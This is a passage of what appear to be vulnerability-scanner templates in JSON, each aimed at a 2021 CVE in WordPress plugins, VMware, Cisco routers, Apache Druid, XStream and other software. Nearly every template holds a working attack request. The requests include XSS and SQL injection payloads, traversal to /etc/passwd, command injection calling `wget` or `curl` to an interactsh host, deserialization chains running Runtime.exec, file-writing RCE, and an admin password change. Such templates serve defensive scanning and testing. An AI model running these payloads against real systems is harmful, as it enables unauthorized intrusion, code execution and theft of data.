|dir</title>","bottom.php"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25067","info":{"name":"Landing Page Builder < 1.4.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=ulpb_post&page=page-builder-new-landing-page&thisPostID=test\"+style=animation-name:rotation+onanimationstart=alert(document.domain)+x= HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"test\\\\\\\" style=animation-name:rotation onanimationstart=alert(document.domain)\")","contains(body_2, \"Enter Page Title\")"],"condition":"and"}]}]},{"id":"CVE-2021-40870","info":{"name":"Aviatrix Controller 6.x before 6.5-1804.1922 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /v1/backend1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nCID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{{randstr}}.php&data=<?php echo md5(\"CVE-2021-40870\"); ?>\n","GET /v1/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["0d95513363fd69b9fee712f333293654"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36748","info":{"name":"PrestaHome Blog for PrestaShop <1.7.8 - SQL Injection","severity":"high"},"requests":[{"raw":["GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1\nHost: {{Hostname}}\n","GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","status_code_2 == 404","contains(body_1, \"prestashop\")","contains(tolower(header_2), 'index.php?controller=404')","len(body_2) == 0"],"condition":"and"}]}]},{"id":"CVE-2021-24214","info":{"name":"WordPress OpenID Connect Generic Client 3.8.0-3.8.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-login.php?login-error=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ERROR (<script>alert(document.domain)</script>):","Login with OpenID Connect"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44152","info":{"name":"Reprise License Manager 14.2 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/goforms/menu"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["RLM Administration Commands"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27309","info":{"name":"Clansphere CMS 2011.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mods/clansphere/lang_modvalidate.php?language=language&module=module%22></script><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>.php"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24275","info":{"name":"Popup by Supsystic <1.10.5 - Cross-Site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38314","info":{"name":"WordPress Redux Framework <=4.2.11 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action={{md5(replace('http://HOST/-redux','HOST',Hostname))}} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /wp-admin/admin-ajax.php?action={{md5(replace('https://HOST/-redux','HOST',Hostname))}} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(body)<50"]},{"type":"regex","name":"meme","part":"body","regex":["[a-f0-9]{32}"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["[a-f0-9]{32}"],"part":"body"}]}]},{"id":"CVE-2021-21973","info":{"name":"VMware vSphere - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1\nHost: {{Hostname}}\nVcip: {{interactsh-url}}\nVcpassword: {{rand_base(6)}}\nVcusername: {{rand_base(6)}}\nReqresource: {{rand_base(6)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["The server sent HTTP status code 200"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-1472","info":{"name":"Cisco Small Business RV Series - OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /upload HTTP/1.1\nHost: {{Hostname}}\nCookie: sessionid='`wget http://{{interactsh-url}}`'\nAuthorization: QUt6NkpTeTE6dmk4cW8=\nContent-Type: multipart/form-data; boundary=---------------------------392306610282184777655655237536\n\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"option\"\n\n5NW9Cw1J\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"destination\"\n\nJ0I5k131j2Ku\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"file.path\"\n\nEKsmqqg0\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"file\"; filename=\"config.xml\"\nContent-Type: application/xml\n\nqJ57CM9\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"filename\"\n\nJbYXJR74n.xml\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"GXbLINHYkFI\"\n\n<input><fileType>configuration</fileType><source><location-url>FILE://Configuration/config.xml</location-url></source><destination><config-type>config-running</config-type></destination></input>\n-----------------------------392306610282184777655655237536--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["\"jsonrpc\":"]}]}]},{"id":"CVE-2021-44528","info":{"name":"Open Redirect in Host Authorization Middleware","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-Host: //interact.sh\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[301,302,307,308]}]}]},{"id":"CVE-2021-20114","info":{"name":"TCExam <= 14.8.1 - Sensitive Information Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cache/backup/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of /cache/backup","Parent Directory",".sql.gz"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25646","info":{"name":"Apache Druid - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /druid/indexer/v1/sampler HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n\"type\":\"index\",\n\"spec\":{\n   \"ioConfig\":{\n      \"type\":\"index\",\n      \"firehose\":{\n         \"type\":\"local\",\n         \"baseDir\":\"/etc\",\n         \"filter\":\"passwd\"\n      }\n   },\n   \"dataSchema\":{\n      \"dataSource\":\"odgjxrrrePz\",\n      \"parser\":{\n         \"parseSpec\":{\n            \"format\":\"javascript\",\n            \"timestampSpec\":{\n\n            },\n            \"dimensionsSpec\":{\n\n            },\n            \"function\":\"function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\\\"/bin/sh`@~-c`@~cat /etc/passwd\\\".split(\\\"`@~\\\")).getInputStream()).useDelimiter(\\\"\\\\A\\\").next();return {timestamp:\\\"4137368\\\",OQtGXcxBVQVL: hTVCCerYZ}}\",\n            \"\":{\n               \"enabled\":\"true\"\n            }\n         }\n      }\n   }\n},\n\"samplerConfig\":{\n   \"numRows\":10\n}\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["numRowsRead","numRowsIndexed"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21972","info":{"name":"VMware vSphere Client (HTML5) - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ui/vropspluginui/rest/services/getstatus"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["VSPHERE-UI-JSESSIONID"],"condition":"and"},{"type":"regex","part":"body","regex":["(Install|Config) Final Progress"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27319","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname={{randstr}}&lastname={{randstr}}&email={{randstr}}%40test.com'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&comment={{randstr}}&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-25074","info":{"name":"WordPress WebP Converter for Media < 4.0.3 - Unauthenticated Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-29484","info":{"name":"Ghost CMS <=4.32 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ghost/preview"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["XMLHttpRequest.prototype.open"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24891","info":{"name":"WordPress Elementor Website Builder <3.1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/elementor/assets/js/frontend.min.js","{{BaseURL}}/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '> 1.5.0', '< 3.1.4') && status_code_1 == 200 && status_code_2 == 200"]},{"type":"regex","part":"body_1","regex":["elementor[\\s-]*v(([0-3]+\\.(([0-5]+\\.[0-5]+)|[0-4]+\\.[0-9]+))|[0-2]+[0-9.]+)"]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["elementor[\\s-]*v(([0-3]+\\.(([0-5]+\\.[0-5]+)|[0-4]+\\.[0-9]+))|[0-2]+[0-9.]+)"],"internal":true},{"type":"kval","kval":["version"]}]}]},{"id":"CVE-2021-20158","info":{"name":"Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change","severity":"critical"},"requests":[{"raw":["POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\n\nccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password={{password}}\n","POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\n\nhtml_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass={{base64(password)}}&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["setConnectDevice","setInternet","setWlanSSID","TEW-827DRU"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24227","info":{"name":"Patreon WordPress  <1.7.0 - Unauthenticated Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?patron_only_image=../../../../../../../../../../etc/passwd&patreon_action=serve_patron_only_image"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24997","info":{"name":"WordPress Guppy <=1.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"guppyUsers\":","\"userId\":","\"type\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31195","info":{"name":"Microsoft Exchange Server - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\\&refurl=}}};alert(document.domain)//"],"matchers-condition":"and","matchers":[{"type":"word","words":["alert(document.domain)//&et=ServerError","mail/bootr.ashx"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-39144","info":{"name":"XStream 1.4.18  - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n  <unserializable-parents/>\n  <java.util.PriorityQueue>\n    <default>\n      <size>2</size>\n    </default>\n    <int>3</int>\n    <dynamic-proxy>\n      <interface>java.lang.Comparable</interface>\n      <handler class='sun.tracing.NullProvider'>\n        <active>true</active>\n        <providerType>java.lang.Comparable</providerType>\n        <probes>\n          <entry>\n            <method>\n              <class>java.lang.Comparable</class>\n              <name>compareTo</name>\n              <parameter-types>\n                <class>java.lang.Object</class>\n              </parameter-types>\n            </method>\n            <sun.tracing.dtrace.DTraceProbe>\n              <proxy class='java.lang.Runtime'/>\n              <implementing__method>\n                <class>java.lang.Runtime</class>\n                <name>exec</name>\n                <parameter-types>\n                  <class>java.lang.String</class>\n                </parameter-types>\n              </implementing__method>\n            </sun.tracing.dtrace.DTraceProbe>\n          </entry>\n        </probes>\n      </handler>\n    </dynamic-proxy>\n    <string>curl http://{{interactsh-url}}</string>\n  </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2021-40822","info":{"name":"Geoserver - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /geoserver/TestWfsPost HTTP/1.1\nHost: oast.pro\nContent-Type: application/x-www-form-urlencoded\n\nform_hf_0=&url=http://oast.pro/geoserver/../&body=&username=&password=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<b>Interactsh</b>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27320","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&lastname={{randstr}}&email={{randstr}}%40test.com&comment={{randstr}}&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-40978","info":{"name":"MKdocs 1.2.2 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:[x*]:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38647","info":{"name":"Microsoft Open Management Infrastructure - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wsman HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/soap+xml;charset=UTF-8\n\n<s:Envelope\n  xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\"\n  xmlns:a=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\"\n  xmlns:n=\"http://schemas.xmlsoap.org/ws/2004/09/enumeration\"\n  xmlns:w=\"http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd\"\n  xmlns:xsi=\"http://www.w3.org/2001/XMLSchema\"\n  xmlns:h=\"http://schemas.microsoft.com/wbem/wsman/1/windows/shell\"\n  xmlns:p=\"http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd\">\n  <s:Header>\n    <a:To>HTTP://{{Hostname}}/wsman/</a:To>\n    <w:ResourceURI s:mustUnderstand=\"true\">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>\n    <a:ReplyTo>\n      <a:Address s:mustUnderstand=\"true\">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>\n    </a:ReplyTo>\n    <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>\n    <w:MaxEnvelopeSize s:mustUnderstand=\"true\">102400</w:MaxEnvelopeSize>\n    <a:MessageID>uuid:00B60932-CC01-0005-0000-000000010000</a:MessageID>\n    <w:OperationTimeout>PT1M30S</w:OperationTimeout>\n    <w:Locale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n    <p:DataLocale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n    <w:OptionSet s:mustUnderstand=\"true\"/>\n    <w:SelectorSet>\n      <w:Selector Name=\"__cimnamespace\">root/scx</w:Selector>\n    </w:SelectorSet>\n  </s:Header>\n  <s:Body>\n    <p:ExecuteScript_INPUT\n      xmlns:p=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\">\n      <p:Script>aWQ=</p:Script>\n      <p:Arguments/>\n      <p:timeout>0</p:timeout>\n      <p:b64encoded>true</p:b64encoded>\n    </p:ExecuteScript_INPUT>\n  </s:Body>\n</s:Envelope>\n"],"matchers":[{"type":"word","words":["<p:StdOut>","uid=0(root) gid=0(root) groups=0"],"condition":"and"}]}]},{"id":"CVE-2021-27519","info":{"name":"FUDForum 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?SQ=0&srch=x\"+onmouseover%3Dalert%281%29+x%3D\"&t=search&btn_submit.x=0&btn_submit.y=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["highlightSearchTerms(\"x\" onmouseover=alert(1) x=\"\");"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24285","info":{"name":"WordPress Car Seller - Auto Classifieds Script - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=request_list_request&order_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["qzvvqhWAAlCfTiMDmAoqzkTpJEzPwVFSaIpfAfdfTinrMqqxkq"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3019","info":{"name":"ffay lanproxy Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../conf/config.properties"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"],"condition":"and"},{"type":"word","part":"body","words":["config.admin.username","config.admin.password"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25003","info":{"name":"WordPress WPCargo Track & Trace <6.9.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/wpcargo/includes/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath={{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-content/plugins/wpcargo/includes/{{randstr}}.php?1=var_dump HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n2={{md5(num)}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 != 200","status_code_2 == 200","status_code_3 == 200","contains(body_3, md5(num))","contains(body_3, 'PNG')"],"condition":"and"}]}]},{"id":"CVE-2021-40971","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[newpassword1]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42663","info":{"name":"Sourcecodester Online Event Booking and Reservation System 2.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pwd={{password}}\n","GET /views/index.php?msg=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</i><script>alert(document.domain)</script></div>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24146","info":{"name":"WordPress Modern Events Calendar Lite <5.16.5 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["mec-events","text/csv"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24917","info":{"name":"WordPress WPS Hide Login <1.9.1 - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nReferer: something\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(location), 'wp-login.php')"]},{"type":"word","part":"header","words":["redirect_to=%2Fwp-admin%2Fsomething&reauth=1"]}],"extractors":[{"type":"kval","kval":["location"]}]}]},{"id":"CVE-2021-38540","info":{"name":"Apache Airflow - Unauthenticated Variable Import","severity":"critical"},"requests":[{"raw":["GET /login/ HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","POST /variable/varimport HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryB874qcjbpxTP1Hj7\nReferer: {{RootURL}}/admin/variable/\n\n------WebKitFormBoundaryB874qcjbpxTP1Hj7\nContent-Disposition: form-data; name=\"csrf_token\"\n\n{{csrf}}\n------WebKitFormBoundaryB874qcjbpxTP1Hj7\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.json\"\nContent-Type: application/json\n\n{\n    \"type\": \"{{randstr}}\"\n}\n\n------WebKitFormBoundaryB874qcjbpxTP1Hj7--\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"Sign In\")","status_code_2 == 302","contains(header_2, \"session=.\")"],"condition":"and"},{"type":"word","words":["You should be redirected automatically to target URL: <a href=\"/\">"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["type=\"hidden\" value=\"(.*?)\">"],"internal":true}]}]},{"id":"CVE-2021-36380","info":{"name":"Sunhillo SureLine <8.7.0.1.1 - Unauthenticated OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi/networkDiag.cgi HTTP/1.1\nHost: {{Hostname}}\n\ncommand=2&ipAddr=&dnsAddr=$(wget+http://{{interactsh-url}})&interface=0&netType=0&scrFilter=&dstFilter=&fileSave=false&pcapSave=false&fileSize=\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-3293","info":{"name":"emlog 5.3.1 Path Disclosure","severity":"medium"},"requests":[{"raw":["GET /t/index.php?action[]=aaaa HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<b>Warning</b>","on line","expects parameter"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24165","info":{"name":"WordPress Ninja Forms <3.4.34 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?client_id=1&redirect=https://interact.sh&action=nf_oauth_connect HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 302","status_code_2 == 302","contains(header_2, 'Location: https://interact.sh?client_id=1')"],"condition":"and"}]}]},{"id":"CVE-2021-39141","info":{"name":"XStream 1.4.18  - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n  <unserializable-parents/>\n  <java.util.PriorityQueue>\n    <default>\n      <size>2</size>\n    </default>\n    <int>3</int>\n    <dynamic-proxy>\n      <interface>java.lang.Comparable</interface>\n      <handler class='com.sun.xml.internal.ws.client.sei.SEIStub'>\n        <owner/>\n        <managedObjectManagerClosed>false</managedObjectManagerClosed>\n        <databinding class='com.sun.xml.internal.ws.db.DatabindingImpl'>\n          <stubHandlers>\n            <entry>\n              <method>\n                <class>java.lang.Comparable</class>\n                <name>compareTo</name>\n                <parameter-types>\n                  <class>java.lang.Object</class>\n                </parameter-types>\n              </method>\n              <com.sun.xml.internal.ws.client.sei.StubHandler>\n                <bodyBuilder class='com.sun.xml.internal.ws.client.sei.BodyBuilder$DocLit'>\n                  <indices>\n                    <int>0</int>\n                  </indices>\n                  <getters>\n                    <com.sun.xml.internal.ws.client.sei.ValueGetter>PLAIN</com.sun.xml.internal.ws.client.sei.ValueGetter>\n                  </getters>\n                  <accessors>\n                    <com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>\n                      <val_-isJAXBElement>false</val_-isJAXBElement>\n                      <val_-getter class='com.sun.xml.internal.ws.spi.db.FieldGetter'>\n                        <type>int</type>\n                        <field>\n                          <name>hash</name>\n                          <clazz>java.lang.String</clazz>\n                        </field>\n                      </val_-getter>\n                      <val_-isListType>false</val_-isListType>\n                      <val_-n>\n                        <namespaceURI/>\n                        <localPart>hash</localPart>\n                        <prefix/>\n                      </val_-n>\n                      <val_-setter class='com.sun.xml.internal.ws.spi.db.MethodSetter'>\n                        <type>java.lang.String</type>\n                        <method>\n                          <class>javax.naming.InitialContext</class>\n                          <name>doLookup</name>\n                          <parameter-types>\n                            <class>java.lang.String</class>\n                          </parameter-types>\n                        </method>\n                      </val_-setter>\n                      <outer-class>\n                        <propertySetters>\n                          <entry>\n                            <string>serialPersistentFields</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>[Ljava.io.ObjectStreamField;</type>\n                              <field>\n                                <name>serialPersistentFields</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>CASE_INSENSITIVE_ORDER</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>java.util.Comparator</type>\n                              <field>\n                                <name>CASE_INSENSITIVE_ORDER</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>serialVersionUID</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>long</type>\n                              <field>\n                                <name>serialVersionUID</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>value</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>[C</type>\n                              <field>\n                                <name>value</name>\n                                